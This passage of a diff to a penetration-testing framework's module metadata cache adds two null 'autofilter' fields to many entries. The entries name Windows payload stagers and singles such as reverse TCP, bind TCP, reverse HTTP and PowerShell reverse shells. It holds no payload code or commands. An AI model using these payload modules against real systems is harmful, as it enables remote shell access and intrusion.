+0000", "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", @@ -109310,6 +138248,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", @@ -109342,6 +138282,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp.rb", @@ -109376,6 +138318,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", @@ -109408,6 +138352,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", @@ -109438,6 +138384,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/findtag_ord.rb", @@ -109470,6 +138418,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", @@ -109501,6 +138451,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", @@ -109532,6 +138484,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", @@ -109564,6 +138518,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", @@ -109596,6 +138552,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", @@ -109629,6 +138587,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", @@ -109663,6 +138623,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", @@ -109697,6 +138659,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", @@ -109729,6 +138693,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", @@ -109760,6 +138726,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-13 14:34:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_udp.rb", @@ -109793,6 +138761,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", @@ -109826,6 +138796,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", @@ -109858,6 +138830,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", @@ -109891,6 +138865,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", @@ -109922,6 +138898,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-27 19:24:51 +0000", "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", @@ -109953,6 +138931,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", @@ -109985,6 +138965,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp.rb", @@ -110019,6 +139001,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", @@ -110051,6 +139035,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", @@ -110081,6 +139067,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/findtag_ord.rb", @@ -110113,6 +139101,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", @@ -110144,6 +139134,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", @@ -110175,6 +139167,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", @@ -110207,6 +139201,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", @@ -110239,6 +139235,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", @@ -110272,6 +139270,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", @@ -110306,6 +139306,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", @@ -110340,6 +139342,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", @@ -110372,6 +139376,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", @@ -110403,6 +139409,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-13 14:34:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_udp.rb", @@ -110435,6 +139443,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-07-19 17:58:45 +0000", "path": "/modules/payloads/singles/windows/powershell_bind_tcp.rb", @@ -110467,6 +139477,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-07-19 17:58:45 +0000", "path": "/modules/payloads/singles/windows/powershell_reverse_tcp.rb", @@ -110500,6 +139512,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", @@ -110533,6 +139547,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", @@ -110565,6 +139581,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", @@ -110598,6 +139616,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", @@ -110629,6 +139649,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-27 19:24:51 +0000", "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", @@ -110660,6 +139682,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", @@ -110692,6 +139716,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp.rb", @@ -110726,6 +139752,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", @@ -110758,6 +139786,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", @@ -110789,6 +139819,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/findtag_ord.rb", @@ -110821,6 +139853,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", @@ -110852,6 +139886,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", @@ -110882,6 +139918,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", @@ -110914,6 +139952,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", @@ -110946,6 +139986,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", @@ -110979,6 +140021,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", @@ -111013,6 +140057,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", @@ -111047,6 +140093,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", @@ -111079,6 +140127,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", @@ -111110,6 +140160,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-13 14:34:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_udp.rb", @@ -111140,6 +140192,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/shell_bind_tcp.rb", @@ -111169,6 +140223,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb", @@ -111200,6 +140256,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-17 16:00:04 +0000", "path": "/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb", @@ -111230,6 +140288,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/shell_reverse_tcp.rb", @@ -111259,6 +140319,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/speak_pwned.rb", @@ -111292,6 +140354,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", @@ -111325,6 +140389,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", @@ -111357,6 +140423,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", @@ -111390,6 +140458,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", @@ -111421,6 +140491,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-27 19:24:51 +0000", "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", @@ -111451,6 +140523,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", @@ -111483,6 +140557,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp.rb", @@ -111517,6 +140593,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", @@ -111549,6 +140627,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", @@ -111580,6 +140660,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/findtag_ord.rb", @@ -111612,6 +140694,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", @@ -111642,6 +140726,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", @@ -111673,6 +140759,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", @@ -111705,6 +140793,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", @@ -111737,6 +140827,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", @@ -111770,6 +140862,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", @@ -111804,6 +140898,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", @@ -111838,6 +140934,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", @@ -111870,6 +140968,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", @@ -111901,6 +141001,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-13 14:34:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_udp.rb", @@ -111934,6 +141036,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", @@ -111967,6 +141071,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", @@ -111999,6 +141105,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", @@ -112032,6 +141140,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", @@ -112063,6 +141173,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-27 19:24:51 +0000", "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", @@ -112094,6 +141206,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", @@ -112126,6 +141240,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp.rb", @@ -112160,6 +141276,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", @@ -112192,6 +141310,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", @@ -112223,6 +141343,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/findtag_ord.rb", @@ -112256,6 +141378,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_hop_http.rb", @@ -112287,6 +141411,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/windows/reverse_http.rb", @@ -112318,6 +141444,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb", @@ -112350,6 +141478,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", @@ -112381,6 +141511,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", @@ -112412,6 +141544,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", @@ -112444,6 +141578,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", @@ -112476,6 +141612,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", @@ -112509,6 +141647,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", @@ -112543,6 +141683,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", @@ -112577,6 +141719,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", @@ -112609,6 +141753,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 15:10:26 +0000", "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", @@ -112640,6 +141786,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-13 14:34:21 +0000", "path": "/modules/payloads/stagers/windows/reverse_udp.rb", @@ -112672,6 +141820,8 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-11-21 13:53:33 +0000", "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb", @@ -112701,6 +141851,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/x64/exec.rb", @@ -112731,6 +141883,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/windows/x64/loadlibrary.rb", @@ -112763,6 +141917,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", @@ -112795,6 +141951,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", @@ -112828,6 +141986,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-02-15 17:37:33 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", @@ -112860,6 +142020,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", @@ -112892,6 +142054,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", @@ -112924,6 +142088,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-20 11:27:43 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb", @@ -112959,6 +142125,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-20 11:27:43 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb", @@ -112991,6 +142159,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-01 03:49:00 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb", @@ -113023,6 +142193,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", @@ -113059,6 +142231,8 @@ "platform": "Windows", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-03-04 17:43:15 +0000", "path": 